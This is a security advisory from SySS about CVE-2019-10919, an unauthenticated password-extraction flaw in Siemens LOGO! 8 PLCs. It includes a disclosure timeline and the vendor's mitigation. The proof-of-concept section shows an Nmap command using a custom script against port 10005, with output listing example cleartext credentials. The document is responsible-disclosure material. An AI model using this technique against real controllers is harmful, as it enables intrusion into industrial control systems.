Siemens LOGO! 8 Missing Authentication

Type packetstorm
Reporter Matthias Deeg
Modified 2019-05-29T00:00:00


                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
Advisory ID: SYSS-2019-013  
Product: LOGO!  
Manufacturer: Siemens  
Affected Version(s): LOGO! 8 (all versions)   
Tested Version(s): LOGO! 8, 6ED1052-2MD00-0BA8 FS:03, 0BA8.Standard V1.08.03  
Vulnerability Type: Missing Authentication for Critical Function (CWE-306)  
Risk Level: High  
Solution Status: Open  
Manufacturer Notification: 2019-04-04  
Solution Date: 2019-05-14 (recommended mitigation by manufacturer)  
Public Disclosure: 2019-05-29  
CVE Reference: CVE-2019-10919  
Authors of Advisory: Manuel Stotz (SySS GmbH), Matthias Deeg (SySS GmbH)  
Siemens LOGO! is a programmable logic controller (PLC) for small  
automation tasks.  
The manufacturer describes the product as follows (see [1]):  
"Simple installation, minimum wiring, user-friendly programming: You can  
easily implement small automation projects with LOGO!, the intelligent  
logic module from Siemens. The LOGO! Logic Module saves space in the  
control cabinet, and lets you easily implement functions, such as  
time-delay switches, time relays, counters and auxiliary relays. "  
Due to storing passwords in a recoverable format on LOGO! 8 PLCs, an  
attacker can gain access to configured passwords as cleartext.  
Vulnerability Details:  
SySS GmbH found out that the provided function "GetProfile" of a LOGO! 8  
PLC that is for instance used by the software tool LOGO! Soft Comfort  
does not require any authentication.  
Thus, an attacker can send a "GetProfile" query to a LOGO! 8 PLC and  
will receive the requested profile information containing sensitive  
data such as different configured passwords.  
This profile data is encrypted - but it is encrypted via 3DES using a  
static, hard-coded cryptographic key, which is described in the SySS  
security advisory SYSS-2019-012 [2]. So, by knowing this 3DES key, an  
attacker can simply decrypt all sensitive data and use the contained  
cleartext passwords (see SySS security advisory SYSS-2019-014 [3]) in  
further attacks.  
Furthermore, SySS GmbH found out that the provided function for setting  
password data on a LOGO! 8 PLC can also be used without any  
authentication. Therefore, an attacker can simply set arbitrary  
passwords by sending a specific request to the LOGO! 8 PLC via the  
Proof of Concept (PoC):  
SySS GmbH could successfully extract sensitive data such as configured  
passwords as cleartext from a LOGO! 8 using a developed Nmap script.  
The following Nmap output exemplarily shows extracting cleartext  
password data from a LOGO! 8 PLC:  
$ nmap -p 10005 --script slig.nse  
Starting Nmap 7.70 ( ) at 2019-04-04 09:35 CEST  
Nmap scan report for  
Host is up (0.00044s latency).  
10005/tcp open stel  
| slig: Gathered Siemens LOGO!8 access details and passwords  
| User: LSCUser  
| Password: S3cret1  
| Enabled: True  
| User: AppUser  
| Password: S3cret2  
| Enabled: True  
| User: WebUser  
| Password: S3cret3  
| Enabled: True  
| User: TDUser  
| Password: S3cret4  
| Enabled: True  
| Protection: Password  
| Program password: SECRET  
|_MMC serial: \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00  
Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds  
A successful attack against a LOGO! 8 extracting all configured  
passwords is demonstrated in our SySS PoC video [7].  
In the publicly released Siemens Security Advisory SSA-542701 [3],  
the manufacturer Siemens recommends to apply a defense-in-depth concept,  
including protection concept outlined in the system manual, as a  
mitigation for reducing the risk of the described security issue.  
Disclosure Timeline:  
2019-04-04: Vulnerability reported to manufacturer  
2019-04-04: Manufacturer confirms receipt of security advisory and  
asks for referenced Nmap script  
2019-04-04: SySS provides PoC Nmap script  
2019-05-14: Public release of Siemens Security Advisory SSA-542701  
2019-05-29: Public release of SySS security advisory  
[1] Product website for Siemens LOGO!  
[2] SySS Security Advisory SYSS-2019-012  
[3] SySS Security Advisory SYSS-2019-014  
[4] SySS Security Advisory SYSS-2019-013  
[5] Siemens Security Advisory SSA-542701  
[6] SySS Responsible Disclosure Policy  
[7] SySS Proof-of-Concept Video "Siemens LOGO! 8 PLC Password Hacking"  
This security vulnerability was found by Manuel Stotz of SySS GmbH.  
E-Mail: manuel.stotz (at)  
Public Key:  
Key fingerprint = F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D  
The information provided in this security advisory is provided "as is"   
and without warranty of any kind. Details of this security advisory may   
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web   
Creative Commons - Attribution (by) - Version 3.0